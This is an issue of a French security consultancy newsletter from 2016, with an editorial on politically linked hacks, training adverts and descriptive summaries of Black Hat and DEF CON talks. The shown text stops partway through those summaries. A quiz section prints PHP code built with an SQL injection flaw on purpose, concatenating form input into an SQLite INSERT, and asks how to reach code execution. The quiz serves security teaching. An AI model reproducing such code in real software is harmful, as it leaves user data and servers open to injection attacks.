[Newsletter HSC] N°141 - Septembre

Newsletter d'information de HSC newsletter at hsc-news.com
Mar 6 Sep 11:53:41 CEST 2016


========================================================================
              HSC Newsletter  --  N°141 --  septembre 2016
========================================================================





       « Nul ne sera l'objet d'immixtions arbitraires dans sa vie privée,
     sa famille, son domicile ou sa correspondance, ni d'atteintes à son
     honneur et à sa réputation. Toute personne a droit à la protection
     de la loi contre de telles immixtions ou de telles atteintes. »


                 [Déclaration universelle des droits de l'homme, article 12 ]



--[ Sommaire ]----------------------------------------------------------

      1. Éditorial
      2. Le saviez-vous ? La question
      3. Redécouvrez la formation "Sécurité Wifi"
      4. Nouvelle formation "Sécurité des données de santé et protection de la
         vie privée"
      5. Nouvelle formation "Se préparer au règlement européen sur la
         protection des données"
      6. Nouvelle certification "RSSI"
      7. Compte-rendu Blackhat/DEFCON 2016
      8. Rencontrez HSC : Rencontres Sécurité, Cyber at hack, Microsoft
         Experience, Assises de la sécurité, ISSE, FIC, Université AFCDP, etc
      9. Agenda des interventions publiques
     10. Prochaines formations HSC
     11. Actualité des associations : Club 27001, OSSIR, Clusif et ISSA
     12. Le saviez-vous ? La réponse



--[ 1. Éditorial - Christophe Renard ]----------------------------------

     "It feels good, well alright, Like a shock to the system" [0]

     Depuis le tournant du siècle, l'absence cruelle des voitures volantes,
 robots de ménage et fusées personnelles sont une déception récurrente.
 Pourtant, 2016 marque un tournant. Nous n'avons peut être pas rejoint
 la fiction des années 50, mais nous sommes fermement entrés dans le
 cyberpunk[1] des années 80.

     Aux États-unis, la sécurité informatique est devenu un acteur de la
 campagne présidentielle. Hillary Clinton est attaquée pour avoir
 utilisé son serveur de messagerie personnel, hébergé à la maison, pour
 les affaires officielles[2]. Mais aussi, les démocrates, piratés
 (parti et organisation de campagne[3]), ont vu leurs échanges
 déversés sur Internet (et peut être altérés[4]). C'est une nouveauté
 politique, mais l'affaire ne s'arrête pas là puisque le pirate
 présumé revendique ses actions en ligne[5], que les autorités
 américaines[6] et les experts techniques intervenus sur le
 piratage (Crowdstrike[7]) attribuent ces actes aux services de
 renseignement russes. Alors que pour la première fois des candidats
 s'invectivent sur des fonds de piratage informatique, que la presse
 généraliste disserte sur la fiabilité d'attribution forensique, une
 alerte du FBI se fait jour annonçant des attaques sur les systèmes de
 votes locaux... encore venant des russes[8].

     Pendant ce temps, des ""chercheurs en sécurité"" s'accoquinent avec
 un fond spécialisé dans la "vente à découvert"[ 9] pour spéculer sur le
 cours en bourse d'un fabriquant d'appareils implantables et mettent
 dramatiquement en scène des annonces de faille[10] plutôt douteuses[11].
 Des opposants politiques se font traquer pour avoir fait confiance à
 une application de messagerie "sécurisée"[12] (suggestions: si vos
 ennemis contrôlent les opérateurs télécoms, ne faites pas confiance aux
 SMS), et d'autres se découvrent ciblés par des logiciels malfaisants
 avancés[14]. Le principal opérateur de virements inter-bancaire découvre
 que les attaques via ses terminaux sont moins rares que supposés [15] et
 le CERT-FR émet des recommandations sur un jeu vidéo qui fait fureur[16].

     Ce compendium disparate n'est pas anodin, non seulement l'informatique
 est maintenant partout, mais elle est devenue un enjeu de société majeur :
 politique, finance, emploi en dépendent. Ces événements viennent nous
 rappeler combien cette infrastructure, souvent vitale est ouverte aux
 abus. Le futur est bien la, celui des corporations géantes aux moyens
 d'états, de affrontements de nations par ordinateurs interposés, de
 surveillance généralisée, ou un jeu vidéo est un phénomène de société,
 et ou les pirates informatiques, mercenaires, espions, voleurs tirent
 partit des failles du système pour leur profit.

 Les amateurs de science-fiction le savent, les futurs de fusées chromées
 et de voitures volantes étaient des utopies scientistes. A contrario le
 courant cyberpunk, se voulait dystopique, un avertissement, pas une
 prédiction.

     Ça tombe bien, c'est la rentrée avec sa pluie d'arrêtés LPM[17].

--

  [0] Billy Idol, Shock to the system, Cyberpunk
  [1] Cyberpunk: https://fr.wikipedia.org/wiki/Cyberpunk
  [2] Le serveur d'Hillary Clinton
      http://www.nytimes.com/interactive/2016/05/27/us/politics/what-we-know-about-hillary-clintons-private-email-server.html?_r=0
  [3] https://en.wikipedia.org/wiki/2016_Democratic_National_Committee_email_leak
  [4] https://motherboard.vice.com/read/all-signs-point-to-russia-being-behind-the-dnc-hack
  [5] Blog de Guccifer2 : https://guccifer2.wordpress.com/
  [6] http://www.nytimes.com/2016/07/27/us/politics/spy-agency-consensus-grows-that-russia-hacked-dnc.html?_r=0
  [7] Rapport Crowstrike
      https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
  [8] Alertes du FBI
      http://www.wsj.com/articles/fbi-warns-of-cyberattacks-on-voter-records-1472505735
  [9] Vente à découvert ou "Shorting"
      https://fr.wikipedia.org/wiki/Vente_%C3%A0_d%C3%A9couvert
 [10] http://arstechnica.com/security/2016/08/trading-in-stock-of-medical-device-paused-after-hackers-team-with-short-seller/
 [11] https://www.riskbasedsecurity.com/2016/08/uncoordinated-vulnerability-disclosure-causing-heart-palpitations-for-st-jude-medical-shareholders/
 [12] https://www.wired.com/2016/08/hack-brief-hackers-breach-ultra-secure-messaging-app-telegram-iran/
 [14] https://citizenlab.org/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
 [15] http://money.cnn.com/2016/08/31/technology/swift-bank-hacks/
 [16] http://www.cert.ssi.gouv.fr/site/CERTFR-2016-ACT-031/index.html
 [17] http://www.ssi.gouv.fr/actualite/cybersecurite-des-oiv-publication-dune-nouvelle-vague-darretes-sectoriels/



--[ 2. Le saviez-vous ? La question ]------------------------------------

     Lors d'un audit de code, vous observez la présence d'une injection SQL
 dans le formulaire d'inscription d'un site utilisant une base de donnée
 SQLite.

     <?php
     class MyDB extends SQLite3{
        function __construct(){
          $this->open('site.db');
        }
      }

      $db = new MyDB();
      [...]
      $username = $_POST['username'];
      $password = $_POST['pwd'];
      $db->exec("INSERT INTO users(username, password) VALUES('".$username."','".$password."')");
      [...]
     ?>

     Savez-vous comment il vous est possible d'abuser de celle-ci pour exécuter
 du code arbitraire sur le système ?

     Réponse au paragraphe 12.



--[ 3. Formation sécurité Wifi mise à jour ]-------------------------------

     Aujourd'hui, les réseaux sans fil se sont démocratisés au point d'être
 naturellement utilisés par tous aussi bien chez soi qu'au bureau.

 Le Wi-Fi, en particulier, est utilisé pour de nombreuses fonctionnalités
 professionnelles :
  - extension du réseau bureautique ;
  - accès pour les visiteurs ;
  - réseaux temporaires ou de fortune ;
  - politique du sans câble apparent.

 Il est présent pratiquement partout, que ce soit dans les transports (trains,
 bus) ou dans les lieux publiques (gares, restaurants, centres commerciaux). Et
 pourtant, il amène de nouveaux risques, par rapport aux connexions filaires,
 régulièrement oublieés ou atténuées face à une simplicité d'installation et
 aux fameux "oui/non, mais c'est pratique".

 Par exemple, fournir un accès Wi-Fi à vos visiteurs, c'est aussi leurs fournir
 un relai vers une partie de votre infrastructure informatique (voire même dans
 son intégralité) alors que vous ne les avez même pas encore identifiés.  Et
 parce qu'utiliser des réseaux physiques séparés coûte, la sécurité repose
 souvent sur la partie logicielle embarquée dans une boite noire (i.e. le point
 d'accès) sur laquelle vous n'avez pas toujours la main.
 Êtes-vous sûr des moyens permettant d'identifier ces individus (pour les
 affecter dans les bons réseaux) ? Êtes-vous sûr du niveau de sécurité
 configuré sur les bornes d'accès ? Qu'en est-il de la robustesse de ces
 dernières face à attaquant bien préparé ayant un accès physique ?

 Encore de nombreuses entreprises préfèrent, par simplicité, utiliser une clé
 unique et partagée (PSK) pour l'ensemble des employés, mais combien changent
 cette dernière régulièrement ou même après le départ d'un collaborateur ?

 Au-delà de la problématique d'authentification des utilisateurs connectés au
 réseau sans-fil (protocoles de sécurité utilisés, secret par clé partagée ou
 certificat) ou la gestion des secrets (IGC, diffusion, renouvellement,
 révocation), il existe des attaques bien connues, documentées
 exhaustivement et souvent simples à mettre en place. On peut citer
 entre autres :
  - brouillage des connexions sans-fil ;
  - bornes d'accès sans-fil malfaisantes (réseaux visiteurs, bornes internet
    dans les trains ou au restaurant) ;
  - écoute passive du trafic des utilisateurs et/ou des services légitimes ;
  - utilisation anonyme de votre connexion internet à des fins abusives
    ou illégales ;
  - compromission des bornes de connexion ;
  - intrusion dans votre SI.

 De ce fait, l'effort pour sécuriser ces réseaux devrait être aussi grand,
 même plus grand, que celui fourni pour protéger vos accès filaires (connexion
 VPN depuis l'Internet, protection des ports ethernet physiques, communication
 et filtrage entre VLAN, etc.).

 Si vous souhaitez approfondir ces sujets, mettre en pratique quelques attaques,
 apprendre à créer des infrastructures adéquates pour mieux se protéger,
 n'hésitez pas à vous renseigner sur la formation Sécurité Wi-Fi :

 http://www.hsc-formation.fr/formations/securite_sansfil.html.fr

 Prochaine session à Paris les 7 et 8 novembre

 Pour vous inscrire et pour tout renseignement, contactez notre service
 formation : formations at hsc.fr
     Lynda Benchikh : +33 141 409 704
     Emilie Bozzolo : +33 140 887 146



--[ 4. Nouvelle formation "Sécurité des données de santé et protection de la
       vie privée" ]

     Depuis 22 ans HSC accompagne les établissements de santé, plus
 récemment les éditeurs et les hébergeurs de données santé, pour sécuriser
 leurs systèmes d'information et préparer leurs dossiers d'agrément. Fort
 de cette expérience, HSC propose une nouvelle formation "Sécurité des données
 de santé et protection de la vie privée", d'une durée de 2 jours.

   - Traitons-nous les données personnelles, notamment celles des Patients,
     dans le respect des réglementations en vigueur (Loi Informatique et
     Libertés, Code de la santé publique, etc.) ?
   - Comment nous conformer aux évolutions légales récentes (Loi de
     modernisation de notre système de santé et Règlement européen pour la
     protection des données) ?
   - Comment informer et recueillir le consentement des Patients pour
     collecter leurs données ?
   - Dans quelles conditions et à qui pouvons-nous transmettre les données
     Patients ?
   - De quels droits les patients disposent-ils sur leurs données ? Comment
     gérer ces droits ?
   - A quelles obligations de sécurité des données sommes-nous tenus ?
     Quelles mesures opérationnelles déployer pour s'y conformer ?
   - Qui peut accéder aux données de santé ? Comment gérer ces accès ?
   - Sommes-nous soumis au RGS ?
   - Sommes-nous un opérateur d'importance vital soumis à la Loi de
     programmation militaire ?
   - Devons-nous être agréés Hébergeur de données de santé ? Devons-nous
     recourir à un hébergeur agréé ?
   - Quelles autorités peuvent accéder aux données des patients (CNIL, ARS,
     perquisitions judiciaires, etc) ?
   - Comment nous préparer à un contrôle de la CNIL ?
   - Quelles traces et documentations devons-nous conserver pour être en
     mesure de démontrer notre conformité ?

     Cette formation vous offre une présentation structurée et synthétique
 des exigences légales nationales et européennes ainsi que des bonnes
 pratiques de sécurité des données et des systèmes d'information de santé :
   - Protection des données personnelles de santé (Loi Informatique et Libertés,
     Règlement européen général pour la protection des données, Code de la santé
     publique, loi de modernisation de notre système de santé)
   - Interopérabilité des systèmes d'information de santé (CI-SIS)
   - Sécurité des systèmes d'information de santé (PGSSI-S, CPS, RGS, LPM)
   - Hébergement des données de santé (agrément HDS)

     Le cours est dispensé par des consultants expérimentés dans le domaine
 de la santé, permettant ainsi un discours pragmatique et opérationnel,
 enrichi de cas concrets- A l'issue de la formation, les supports de cours
 et des outils pratiques conçus par les consultants HSC seront remis aux
 stagiaires :
   - exemple de mentions d'information et de recueil du consentement patient ;
   - modèle de fiche de traitement composant le registre des traitements du CIL ;
   - exemple de plan détaillé d'une PSSI adaptée Santé ;
   - extrait d'appréciation des risques-

 Public visé : RSSI, Juristes, CIL/DPO, Médecins DIM, Directeurs juridiques,
 Chef de projet e-santé et toute personne confrontée à la gestion d'un
 système d'information de santé.
 Aucun pré-requis n'est nécessaire mais avoir une culture générale en sécurité
 des systèmes d'information ou en droit est un plus.

 Première session à Paris du 22 au 23 mai 2017.

 Pour vous inscrire et pour tout renseignement, contactez notre service
 formation : formations at hsc.fr
     Lynda Benchikh : +33 141 409 704
     Emilie Bozzolo : +33 140 887 146



--[ 5. Nouvelle formation "Se préparer au règlement européen sur la protection
       des données" ]

     Le règlement européen sur la protection des données personnelles vient
 refondre le cadre juridique applicable en matière « informatique et
 libertés ». Il apporte de nombreuses évolutions par rapport au cadre actuel,
 en exigeant notamment une véritable gouvernance de la protection des données.

 Par conséquent, il importe d'anticiper dès à présent ses dispositions,
 d'autant que le délai de 2 ans laissé aux organismes pour se préparer, et qui
 amène à une application aux alentours du printemps 2018, est significatif de
 l'ampleur des tâches à mener.

 Vous allez apprendre :
   - Quelles sont les évolutions apportées par le règlement ?
   - Quelles sont leurs implications opérationnelles ?
   - Comment se préparer efficacement à l'application du règlement ?

 Public visé : CIL, Futurs DPO, Responsables « informatique et libertés » ou
 vie privée, Juristes, Directions et RSSI.

 http://www.hsc-formation.fr/formations/protection_donnees.html.fr

 Prochaine session à Paris le 7 octobre.

 Pour vous inscrire et pour tout renseignement, contactez notre service
 formation : formations at hsc.fr
     Lynda Benchikh : +33 141 409 704
     Emilie Bozzolo : +33 140 887 146



--[ 6. Nouvelle certification "RSSI" ]-------------------------------------

     Depuis 2008 HSC vous a proposé 18 sessions de formation RSSI,
 animées par les principaux consultants séniors d'HSC, avec les interventions
 de 16 RSSI la dernière après-midi, que nous remercions (certains sont
 venus 2 fois !).

 HSC complète cette formation d'une 'certification RSSI' délivrée par Deloitte.

 Deloitte est l'un des quatre grands cabinets d'audit et de conseil dans le
 monde. Deloitte est constitué d'entités légalement autonomes et indépendantes,
 membres du réseau, associées au sein d'une association suisse.
 Deloitte France appartient à 100 % à des associés français.
 Deloitte délivre la certification "RSSI", à l'issue d'un examen conçu par
 HSC et Deloitte.

 L'examen est un QCM en français sur ordinateur qui dure une heure et demi et
 se déroule à l'issue de la formation dans les locaux d'HSC le vendredi
 après-midi. Il inclut tous les aspects couverts lors de la formation :
 bases de la sécurité, politique, charte, gestion des risques, principales
 mesures de sécurité, sensibilisation, gestion d'incident, audit, ISO27001,
 achats de produits et prestations, etc. Cette certification vous permet de
 prouver que vous avez non seuleument suivi la formation mais retenu et
 compris les concepts qui ont été expliqués.

 http://www.hsc-formation.fr/formations/formationRSSI.html.fr

 Prochaine session à Paris du 3 au 7 octobre.

 Pour vous inscrire et pour tout renseignement, contactez notre service
 formation : formations at hsc.fr
     Lynda Benchikh : +33 141 409 704
     Emilie Bozzolo : +33 140 887 146



--[ 7. Compte-rendu de Blackhat/DEFCON 2016 ]------------------------------
       par Matthieu Schipman et Baptiste Dolbeau

 The Linux kernel hidden inside Windows 10
 ==================================================
 Par Alex Ionescu

 À la suite d'un tweet, Alex Ionescu s'intéresse au WSL (Windows Subsystem for
 Linux) qui est une interface du noyau Linux implanté dans Windows 10. WSL a
 été créé pour le projet Astoria, prévu pour intégrer des applications Android
 sur Windows 10 mobile. Ce projet apparemment abandonné a finalement été remis
 à l'actualité en janvier 2016 avec la découverte de deux fichiers : lxcore.sys
 et lxss.sys. La mise en place de cette nouvelle interface augmente la surface
 d'attaque. En effet, plusieurs moyens permettent d'établir une communication
 entre un processus Windows et un processus Linux. Les maliciels pourraient
 ainsi profiter des avantages des deux systèmes. Deux démonstrations concluent
 la présentation en montrant comment interagir avec Linux.

https://github.com/ionescu007/lxss/blob/master/The%20Linux%20kernel%20hidden%20inside%20windows%2010.pdf



 $hell on Earth: From Browser to System Compromise
 ==================================================
 Matt Molinyawe, Jasiel Spelman, Abdul-Aziz Hariri et Joshua Smith
 Trendmicro

 Cette présentation dresse un panorama des techniques utilisées pour exploiter
 les vulnérabilités dans différents navigateurs, et ainsi récupérer un accès
 sur la machine compromise. En reprenant la conférence Pwn2Own, dont le
 principe est de compromettre une machine (à jour) pour pouvoir l'acquérir, les
 conférenciers expliquent les différentes attaques mises en place.  Ces
 dernières exploitent Safari, Chrome, Microsoft Edge et Adobe Flash afin de
 récupérer les droits les plus élevés sur les machines, ce qui conduit à une
 compromission totale.
 Le quatuor conclut sur le fait que malgré le cloisonnement des applications,
 ce type d'exploitation reste tout à fait possible et que l'on risque d'en voir
 encore plus à l'avenir, à la vue de l'importance que prend la recherche en
 sécurité informatique.

https://www.blackhat.com/docs/us-16/materials/us-16-Molinyawe-Shell-On-Earth-From-Browser-To-System-Compromise.pdf



 TCP Injection Attacks in the Wild - A Large Scale Study
 ==================================================
 Par Gabi Nakibly, Jaime Schcolnik et Yossi Rubin

 Cette présentation dresse un bilan des différentes attaques d'injections TCP
 par "Out Of Band" observées sur le terrain. Ils constatent trois types :
  - Injection non commerciale ;
  - Injection de publicité ;
  - Injection malfaisante.
 À la suite de leur analyse, ils ont pu conclure que pour ce type d'attaque,
 l'injecteur se situait au sein du Système Autonome (Autonomous System en
 anglais) du site web ciblé. En essayant en vain de reproduire ces injections,
 ils ont pu constater que ces attaques ne ciblaient que temporairement les
 victimes dans le but de ne pas être découvertes. La plupart de ces injections
 sont observées depuis des Systèmes Autonomes provenant de Chine.

https://www.blackhat.com/docs/us-16/materials/us-16-Nakibly-TCP-Injection-Attacks-in-the-Wild-A-Large-Scale-Study.pdf



 Horse Pill: A New Type of Linux Rootkit
 ==================================================
 Par Michael Leibowitz

 Cette conférence présente un nouveau type de rootkit visant les systèmes
 Linux. Après avoir expliqué ce qu'est un rootkit (un maliciel permettant de
 maintenir un accès camouflé sur le système compromis même après un
 redémarrage), un court historique des rootkits Linux est réalisé :
 injection dans /dev/mem, implantation d'un module noyau, ajout d'une
 bibliothèque malfaisante dans LD_PRELOAD ou encore modification de inetd.
 Cette nouvelle technique permet de stocker la porte dérobée dans le ramdisk.
 Ainsi, lors du processus de démarrage, au lieu de lancer les scripts d'init,
 une énumération des threads noyau puis un clone est effectué. Cette technique
 permet également de survivre à une mise à jour du noyau Linux.  La
 contre-mesure recommandée par Michael est d'arrêter de créer les ramdisks sur
 le même système.

https://www.blackhat.com/docs/us-16/materials/us-16-Leibowitz-Horse-Pill-A-New-Type-Of-Linux-Rootkit.pdf



 Applied Machine Learning for Exfil and Other Fun Topics
 ==================================================
 Par Matt Wolff, Brian Wallace et Wuan Zhao

 Après un court rappel théorique, Matt Wolf présente des exemples concrets
 d'utilisation du "machine learning" appliqués à la sécurité, et des outils
 développés par son équipe. Ainsi, en utilisant divers outils mathématiques
 (algorithmes de classification, chaînes de Markov), il propose des utilitaires
 permettant par exemple de regrouper les hôtes d'un scan nmap de manière
 logique, de détecter les sites dissimulant des panneaux de contrôle de
 botnets, ou d'obfusquer des données sensibles comme des données de cartes
 bleues.

https://www.blackhat.com/docs/us-16/materials/us-16-Wolff-Applied-Machine-Learning-For-Data-Exfil-And-Other-Fun-Topics.pdf



 CANSPY: A Platform for Auditing CAN Devices
 ==================================================
 Par Jonathan-Christofer Demay et Arnaud Lebrun

 Les constructeurs ont longtemps privilégié la sûreté à la sécurité. Cependant,
 les études menées ces dernières années ont largement démontré la nécessité de
 sécuriser les véhicules "connectés" contre les attaques informatiques. C'est
 dans ce but que l'équipe d'Airbus présente son outil open source d'analyse et
 d'attaque du bus CAN: CANspy.
 Le bus CAN est un bus de communication reliant différents modules
 électroniques, les ECU (Electronic Control Unit). Les ECU peuvent remplir des
 fonctions variées, comme le contrôle de l'air conditionné, des vitres
 électriques, de l'affichage des informations au conducteur, ainsi que des
 fonctions critiques telles que la gestion de la puissance motrice, du freinage
 ou de la direction. Composé d'une partie matérielle et d'une suite d'outils,
 CANspy permet de se placer en interception sur le bus CAN afin d'écouter les
 communications entre les ECUs ou de mener des attaques du singe intercepteur
 en injectant des trames.

https://www.blackhat.com/docs/us-16/materials/us-16-Demay-CANSPY-A-Platorm-For-Auditing-CAN-Devices.pdf



 Recover a RSA Private Key from a TLS Session with Perfect Forward Secrecy
 ==================================================
 Par Marco Ortisi

 Basée sur une étude de Florian Weimer datant de 2015 [1], cette présentation
 vise à démontrer la faisabilité des attaques sur RSA lorsque l'optimisation
 CRT (Chinese Remainder Theorem) est utilisée, en proposant plusieurs outils
 automatisant l'exploitation de cette vulnérabilité.
 Cette attaque exploite une erreur de signature RSA, événement rare dans des
 conditions idéales mais beaucoup plus fréquent sur les équipements embarqués,
 mais aussi sur des équipements de sécurité tels que certains pare-feux ou
 concentrateurs VPN.
 Grâce à ses outils "High Voltage !" et Piciolla, Marco Ortisi nous fait la
 démonstration de l'extraction d'une clef privée RSA en exploitant cette
 vulnérabilité.

https://www.blackhat.com/docs/us-16/materials/us-16-Ortisi-Recover-A-RSA-Private-Key-From-A-TLS-Session-With-Perfect-Forward-Secrecy.pdf
 [1] https://people.redhat.com/~fweimer/rsa-crt-leaks.pdf



 GreatFET: Making GoodFET Great Again
 ==================================================
 Par Michael Ossmann

 Initialement un outil de débogage matériel open source créé par Travis
 Goodspeed, GoodFET est rapidement devenu l'outil de prédilection des 'hackers
 hardware'.
 GoodFET a connu de très nombreuses versions, chacune avec ses avantages et ses
 limitations, l'inconvénient majeur commun à toutes les versions étant les
 performances et le manque de flexibilité du code.
 Michael Ossmann, créateur de HackRF, a donc décidé de créer GreatFET. Avec son
 ARM Cortex 200 MHz et les multiples extensions, GreatFET est le digne
 successeur de GoodFET.

 https://www.blackhat.com/docs/us-16/materials/us-16-Ossmann-GreatFET-Making-GoodFET-Great-Again.pdf



 Advanced CAN Injection Techniques for Vehicle Networks
 ==================================================
 Par Charlie Miller et Chris Valasek

 On peut penser qu'une fois qu'un attaquant a accès au bus CAN d'un véhicule,
 il peut tout faire. Ça n'est pas aussi simple. En effet, si le format de
 transport de données est spécifié, les données transportées, elles, sont
 propriétaires et varient en fonction des constructeurs et des véhicules.
 Charlie Miller, la star du "car hacking", montre dans cette conférence le
 résultat de ses travaux et dévoile quelques techniques permettant de
 contourner le problème complexe des conflits dans les messages CAN, qui
 rendent les ECU (Electronic Control Units) inactifs. Les attaques les plus
 spectaculaires leur permettent de faire freiner et même faire tourner la
 voiture à distance.
 Le bus CAN n'a pas été créé pour être sécurisé, mais il est grand temps de
 changer les choses, notamment par l'utilisation d'IDS/IPS et de signature
 électronique du code des ECUs.



 Windows 10 Mitigation Improvements
 ==================================================
 Par Matt Miller et Davis Weston

 Après une longue explication de la nécessité de faire de la sécurité
 offensive, de la "threat intelligence" et de la défense "orientée donnée"
 (analyse des attaques existantes) au sein de Microsoft, les présentateurs ont
 passé en revue les différentes mesures de sécurité ajoutées ou corrigées dans
 Windows 10 et son navigateur Edge. Notamment MemGC, le ramasse-miette mémoire,
 les améliorations au Control Flow guard et à AppContainer. Et enfin, la
 fonctionnalité très intéressante de "sécurité basée sur la virtualisation"
 (VBS), qui vise à séparer les composants critiques de Windows dans une machine
 dédiée afin de mieux les isoler du reste du système.
 L'idée générale de cette conférence est de promouvoir les mesures visant à
 éliminer des classes d'exploitations plutôt que celles consistant à poser des
 rustines ça et là en réponse à une exploitation donnée.

https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf



 Attacking SDN Infrastructure: Are We Ready for the Next-Gen Networking?
 ==================================================
 Par Changhoon Yoon et Seungsoo Lee

 Après la virtualisation des serveurs et postes de travail, le SDN (Software
 Defined Network) et le SDDC (Software Defined DataCenter) sont une évolution
 naturelle de nos SI. Le but du SDN est de séparer le contrôle du réseau et le
 transfert des données, ce qui permet une gestion centralisée de réseaux même
 s'ils sont hétérogènes.
 Changhoon Yoon, Seungsoo Lee et Seungwon Shin mettent en lumière dans cette
 présentation plusieurs problèmes de sécurité, notamment dus au manque de
 contrôle d'intégrité des configurations poussées et de l'absence
 d'authentification des différents noeuds. Ils proposent également des
 solutions, comme l'utilisation de l'extension "security-mode" d'ONOS qui
 permet d'appliquer une politique de sécurité par application et de détecter et
 bloquer les attaques, ainsi qu'un outil de test de sécurité (DELTA) [1]
 facilitant la détection des diverses vulnérabilités décrites.

https://www.blackhat.com/docs/us-16/materials/us-16-Yoon-Attacking-SDN-Infrastructure-Are-We-Ready-For-The-Next-Gen-Networking.pdf
 [1] http://opensourcesdn.org/projects/project-delta-sdn-security-evaluation-framework/



 DARPA Cyber Grand Challenge
 ==================================================
 Par Mike Walker et Dr. Arati Prabhakar

 Une conférence très attendue, puisqu'il s'agit de la finale CGC se déroulant
 en temps réel. Le sujet est unique : un challenge de type CTF Attaque/Défense
 uniquement opéré par des machines ! Ainsi, durant 24h, les différentes
 machines (sept équipes au total) reçoivent des programmes exécutables. Elles
 sont ensuite chargées d'y trouver les vulnérabilités, corriger celles-ci puis
 d'attaquer les six autres machines pour remporter le point. Présenté sous
 forme d'une compétition, c'est un enjeu important de recherche pour la mise
 en place d'un système automatisé qui pourrait détecter les failles et les
 corriger avec la vitesse d'une machine.
 Le lendemain, l'équipe Mayhem a été annoncée grande gagnante du tournoi et
 récompensée par la somme de deux millions de dollars.



 CAN i haz car secret plz?
 ==================================================
 Par Javier Vazquez Vidal et Ferdinand Noelsche

 Javier Vazquez Vidal et Ferdinand Noelsche nous présentent leur outil
 CANbadger, qui permet, comme son nom l'indique, d'interférer avec les bus CAN
 présents dans les véhicules.
 Cette carte d'interface supporte différents protocoles (CAN, UDS, TP2.0) et
 permet de mener des attaques du singe intercepteur de façon très efficace.
 En effet, des règles stockées sur la carte permettent de réagir en temps réel
 en fonction du trafic rencontré pour, par exemple, détourner une session
 SecurityAccess (accès authentifié à des fonctions sensibles) ou injecter du
 trafic de façon ciblée.
 Une autre fonctionnalité très intéressante de CANbadger est la possibité de
 faire fonctionner plusieurs cartes simultanément en les synchronisant avec un
 "CANbadger server", ce qui permet de mener des attaques beaucoup plus
 élaborées.

 https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Javier-Vazquez-You-CAN-haz-car-Secretz-UPDATED.pdf



 (Ab)using Smart Cities - The Dark Age of Modern Mobility
 ==================================================
 Par Matteo Beccaro et Matteo Collura

 Avec leur infrastructure connectée, les villes intelligentes et plus
 particulièrement le système de transport est mis à nu dans cette conférence.
 Autour des trois axes de transport (privés, partagés et publics), le duo
 italien met en évidence l'absence de sécurité pour ces différents services
 en prenant comme exemple un dispositif personnel de parking ou encore un vélo
 mis à disposition comme les vélib à Paris.
 En effet, le chargement d'un firmware modifié dans la carte de parking rendu
 possible par l'absence de chiffrement, d'authentification et de vérification
 d'intégrité. Pour ce qui est du vélo, ils prouvent que le code de l'application
 mobile gérant la location de vélo n'est pas obfusqué et est vulnérable à des
 injections SQL. Enfin, le transport public de la ville utilise des cartes avec
 la technologie MiFare qui sont vulnérables à des injections.
 Bien que cette conférence n'aille pas très loin dans l'exploitation, notamment
 d'autres services comme la gestion de la surveillance, du trafic ou encore de
 l'apport en eau, elle a le mérite de montrer que la sécurité n'est pas
 implémentée d'une bonne manière.

 http://gsec.hitb.org/materials/sg2016/D2%20-%20Matteo%20Beccaro%20and%20Matteo%20Collura%20-%20Abusing%20Smart%20Cities.pdf



 Sentient Storage - Do SSDs Have a Mind of Their Own
 ==================================================
 Par Tom Kopchak

 Cette conférence présente le résultat d'une étude sur le comportement des
 disques SSD dans un contexte inforensique.
 Les disques durs standards ont un comportement connu et identique quelque soit
 leur constructeur et leur version. Le comportement des SSD varie en revanche
 selon les fabricants et les versions du firmware, ce qui rend les études
 inforensiques beaucoup plus complexes.
 L'étude a été menée avec un disque standard témoin et des SSD de différentes
 marques et générations, avec à chaque fois la comparaison de leur comportement
 suite à une suppression simple et un formatage rapide. Les résultats obtenus
 peuvent servir de référence lors d'une étude inforensique, mais les variations
 étant importantes même pour un même constructeur donné, il est toujours plus
 prudent de procéder à des tests préalables sur du matériel identique pour
 valider les résultats.

 https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Tom-Kopchak-Sentient-Storage.pdf



 Six Degrees of Domain Admin
 ==================================================
 Par Andy Robbins, Rohan Vazarkar et Will Schroeder

 Dans cette conférence, l'équipe de Veris Group aborde le sujet de la
 création de chemin d'attaques dans un environnement Active Directory à
 l'image de certains outils préexistants, par exemple celui de l'ANSSI [1].
 Powerview permet tout d'abord de récupérer les droits des différents éléments
 du domaine ou de la forêt en utilisant Powershell et sans avoir d'accès
 privilégiés.
 Ce sont ces informations qui vont permettre à l'outil BloodHound de remplir sa
 base de données neo4j et ainsi de mettre en évidence des chemins d'attaques
 souhaités. L'outil est disponible sur github à l'adresse suivante :
 https://github.com/adaptivethreat/Bloodhound

 https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Robbins-Vazarkar-Schroeder-Six-Degrees-of-Domain-Admin-UPDATED.pdf
 [1] https://github.com/ANSSI-FR/AD-control-paths



 How to do it Wrong: Smartphone Antivirus and Security Applications Under Fire
 ==================================================
 Par Stephan Huber et Siegfried Rasthofer

 Un retour d'analyse de différentes solutions antivirus pour mobile.
 Les objectifs des chercheurs étaient multiples et ont pourtant tous pu être
 atteints avec succès :
  - Récupérer l'accès premium sans réaliser le paiement ;
  - Utiliser de manière frauduleuse les fonctionnalités proposées à distance ;
  - Modifier à distance le comportement du moteur de recherche de virus ;
  - Exécuter du code à distance.
 L'exploitation de la plupart des vulnérabilités est rendu possible à cause
 d'une absence de sécurisation du processus. On note ainsi une vérification
 du statut "premium" par rapport à la valeur d'un paramètre dans un fichier
 modifiable dans le téléphone, un "chiffrement" d'une communication par XOR,
 un processus de verrouillage ou d'effacement à distance possédant un mot de
 passe vide par défaut, mais aussi une exécution de code arbitraire grâce à
 l'alliance d'une communication non chiffrée et d'un écrasement de fichier par
 remontée de répertoire.
 Avec cette présentation, le duo de chercheurs nous prouve qu'il reste encore
 un long chemin à parcourir pour que ce type d'application censé protéger soit
 effectivement sécurisé.

 https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Huber-Rasthofer-Smartphone-Antivirus-And-Security-Applications-Under-Fire.pdf



 Cheating at Poker James Bond Style
 ==================================================
 Par Elie Bursztein, Celine Bursztein et Jean Michel Picod

 Cette conférence remplace celle prévue sur les avions par Sebastian Westerhold.
 Une vidéo présente un jeu de poker et un appareil évoquant un téléphone. Une
 fois les cartes mélangées, le téléphone prédit magiquement les deux prochaines
 cartes.
